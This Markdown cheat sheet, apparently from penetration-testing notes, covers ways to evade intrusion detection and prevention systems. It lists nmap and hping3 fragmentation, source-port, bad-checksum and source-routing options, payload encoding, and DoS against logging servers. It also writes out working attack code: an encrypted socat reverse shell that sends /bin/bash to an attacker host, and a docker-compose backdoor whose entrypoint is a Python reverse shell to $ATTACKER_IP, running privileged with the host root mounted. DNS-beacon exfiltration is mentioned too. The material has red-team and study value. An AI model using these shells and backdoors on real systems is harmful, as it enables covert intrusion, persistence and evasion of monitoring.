115 lines
3.2 KiB
Markdown
115 lines
3.2 KiB
Markdown
|
# IDS & IPS Evation
|
||
|
|
||
|
* Evation by manipulation of
|
||
|
* Tool parameters
|
||
|
* Protocol
|
||
|
* Payload
|
||
|
* Route
|
||
|
* Or DoS
|
||
|
|
||
|
## Enumeration
|
||
|
|
||
|
* [User-Agents](https://developers.whatismybrowser.com/useragents/explore/)
|
||
|
|
||
|
### nmap
|
||
|
* `--script-args http.useragent="<user-agent>"`
|
||
|
* `-Ss` half open
|
||
|
|
||
|
### nikto
|
||
|
|
||
|
* `-useragent <user-agent>`
|
||
|
* Tuning `-T 1 2 3`
|
||
|
* __NOT__`-evasion <encoding-technique>`, it increases detection
|
||
|
|
||
|
## Protocol Manipulation
|
||
|
|
||
|
### Relying on another protocol
|
||
|
* `nc -ulvnp 4711` for listening to incoming UDP traffic
|
||
|
* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP
|
||
|
|
||
|
### Manipulation of the source's or LHOST's network port
|
||
|
* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it
|
||
|
|
||
|
### Session splicing by fragmentation and segmentation
|
||
|
* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu <size>` for MTU
|
||
|
* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag <num>` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP`
|
||
|
|
||
|
### Sending invalid packets
|
||
|
* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN`
|
||
|
* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R`
|
||
|
|
||
|
## Payload Manipulation
|
||
|
|
||
|
### Obfuscation and Encoding
|
||
|
* Base64
|
||
|
* URL
|
||
|
* Escaped Unicode Characters
|
||
|
|
||
|
### Encrypting Communication Channels
|
||
|
* Use socat with encryption
|
||
|
```sh
|
||
|
openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
|
||
|
```
|
||
|
* Create `.pem` (Privacy Enhanced Mail) file via
|
||
|
```
|
||
|
cat id_rsa.key reverse.crt > reverse.pem
|
||
|
```
|
||
|
* Listening on attacker side
|
||
|
```sh
|
||
|
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
|
||
|
```
|
||
|
* On target
|
||
|
```sh
|
||
|
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
|
||
|
```
|
||
|
|
||
|
### Modification of Data
|
||
|
* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
|
||
|
* Adding whitespaces to the commands
|
||
|
* Use aliases
|
||
|
|
||
|
## Route Manipulation
|
||
|
|
||
|
### Relying on Source Routing
|
||
|
* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely
|
||
|
* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly
|
||
|
|
||
|
### Using Proxyy Servers
|
||
|
* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP`
|
||
|
|
||
|
## Tactical DoS
|
||
|
* Non malicious, benign traffic against
|
||
|
* IDS/IPS
|
||
|
* Logging server
|
||
|
|
||
|
## MISC
|
||
|
|
||
|
* Changing
|
||
|
* `User-Agent`
|
||
|
* Request frequency and duration of sleep
|
||
|
* SSL/TLS certs
|
||
|
* DNS beacon, storing exfiltrated data in the query
|
||
|
|
||
|
## Backdoors
|
||
|
|
||
|
* Backdooring without getting recognized by the IDS/IPS by reading its rules in the config file
|
||
|
|
||
|
### Docker
|
||
|
|
||
|
* Create a `docker-compose.yaml` file with a reverse shell as an entry point, mount the host volume to `/mnt` inside the container
|
||
|
```yaml
|
||
|
---
|
||
|
version: "2.1"
|
||
|
services:
|
||
|
backdoorservice:
|
||
|
restart: always
|
||
|
image: <Found image>
|
||
|
entrypoint: >
|
||
|
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
|
||
|
s.connect(("<$ATTACKER_IP>",4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
|
||
|
pty.spawn("/bin/sh")'
|
||
|
volumes:
|
||
|
- /:/mnt
|
||
|
privileged: true
|
||
|
```
|